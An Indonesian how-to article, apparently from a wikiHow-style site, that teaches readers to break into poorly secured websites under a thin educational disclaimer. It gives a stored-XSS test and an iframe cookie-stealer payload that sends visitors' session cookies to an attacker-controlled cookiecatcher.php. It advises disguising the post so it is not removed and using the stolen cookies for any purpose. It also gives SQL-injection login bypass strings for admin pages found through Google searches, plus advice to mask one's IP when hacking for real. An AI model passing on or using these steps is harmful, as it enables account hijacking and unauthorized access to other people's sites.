Unduh PDF
Unduh PDF
Catatan: 'Panduan' ini digunakan untuk tujuan pendidikan, agar orang lain belajar meretas untuk kebaikan, atau untuk melihat cara kerja peretas dalam melindungi situs mereka sendiri dengan lebih baik. Tutorial ini akan memberikan langkah-langkah mendapatkan akses ke situs web yang memiliki keamanan yang rendah.
Langkah
-
Temukan situs rentan untuk Anda bisa memosting konten. Contohnya papan pesan. Ingat, jika situs tersebut aman maka hal ini tidak akan bekerja.
-
Ciptakan postingan baru. Anda harus mengetikkan beberapa kode khusus ke dalam “post” yang akan menangkap semua data yang mengekliknya.
- Ujilah untuk melihat apakah sistem dapat menyaring kode. Postinglah
<script>window.alert(“test”)</script>
. Jika kotak peringatan muncul ketika Anda mengeklik postingan, situs tersebut rentan terhadap serangan.
- Ujilah untuk melihat apakah sistem dapat menyaring kode. Postinglah
-
Ciptakan dan unggahlah penangkap kuki. Tujuan serangan ini adalah untuk menangkap kuki pengguna sehingga Anda dapat mengakses akun mereka pada situs web dengan proses masuk yang rentan. Anda memerlukan penangkap kuki yang akan menangkap dan mengubah rute kuki target. Unggahlah penangkap ini ke situs web yang Anda miliki akses dan mendukung php.
-
Postinglah dengan penangkap kuki. Memasukkan kode yang tepat ke dalam postingan akan menangkap dan mengirim kuki ke situs Anda. Masukkan sebagian teks setelah kode tersebut untuk mengurangi kecurigaan dan mencegah postingan Anda dihapus.
- Contoh kode penangkap kuki terlihat seperti berikut
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- Contoh kode penangkap kuki terlihat seperti berikut
-
Gunakan kuki yang telah dikumpulkan. Setelah ini, Anda dapat menggunakan informasi kuki yang tersimpan di situs web Anda untuk tujuan apa saja.Iklan
-
Temukan situs yang rentan. Anda harus menemukan situs yang rentan agar mudah menembus proses masuk admin. Carilah di Google dengan kata kunci login.asp.
-
Masuklah sebagai admin. Ketikkan admin sebagai nama pengguna dan gunakan string tertentu sebagai kata sandi. Anda bisa menggunakan sejumlah string yang berbeda, namun yang biasanya digunakan adalah 1’or’1’=’1.
-
Bersabarlah. Anda harus banyak mencoba-coba.
-
Akseslah situs web. Nantinya Anda akan menemukan string untuk mengakses halaman admin situs web, dengan asumsi situs web ini rentan terhadap serangan.Iklan
-
Pelajari satu atau beberapa bahasa pemrograman. Jika Anda ingin serius mempelajari cara meretas situs web, Anda harus memahami cara kerja komputer dan teknologi lainnya. Belajarlah menggunakan bahasa pemrograman seperti Python atau SQL, sehingga Anda bisa mendapatkan kontrol komputer yang lebih baik dan mengidentifikasi kerentanan dalam sistem.
-
Kuasailah pemrograman HTML. Anda harus memiliki pemahaman html dan javascript yang benar-benar baik untuk dapat meretas situs web pada khususnya. Belajar pemrograman memerlukan waktu, namun ada banyak cara untuk Anda belajar lewat internet, sehingga kesempatan belajar selalu terbuka.
-
Berdiskusilah dengan para whitehat. Whitehat adalah peretas yang menggunakan keahlian mereka untuk kebaikan, mengekspos kerentanan keamanan dan menjadikan internet tempat yang lebih baik untuk setiap orang. Agar bisa belajar meretas dan menggunakan keahlian Anda untuk kebaikan atau membantu melindungi situs web Anda sendiri, hubungi para whitehat untuk meminta saran.
-
Lakukan penelitian tentang peretasan. Anda harus melakukan banyak penelitian untuk belajar meretas atau ingin melindungi web sendiri. Banyak sekali cara-cara menembus situs web dapat rentan dan hal ini selalu berubah, sehingga Anda harus terus-menerus belajar.
-
Usahakan selalu terbarui. Teknik meretas terus berkembang dan Anda harus selalu terbarui. Hanya karena Anda terlindungi dari jenis peretasan tertentu saat ini, bukan berarti Anda akan aman di masa depan!Iklan
Tips
- Kunjungi forum peretas untuk mendapatkan banyak kiat bermanfaat.
Iklan
Peringatan
- Jika Anda ingin meretas dalam dunia nyata, acaklah alamat IP Anda menggunakan perangkat lunak yang tersedia di internet.
- Membaca artikel ini bukan berarti Anda langsung menjadi seorang peretas. Anda HARUS terus belajar dan berlatih.
Iklan
Iklan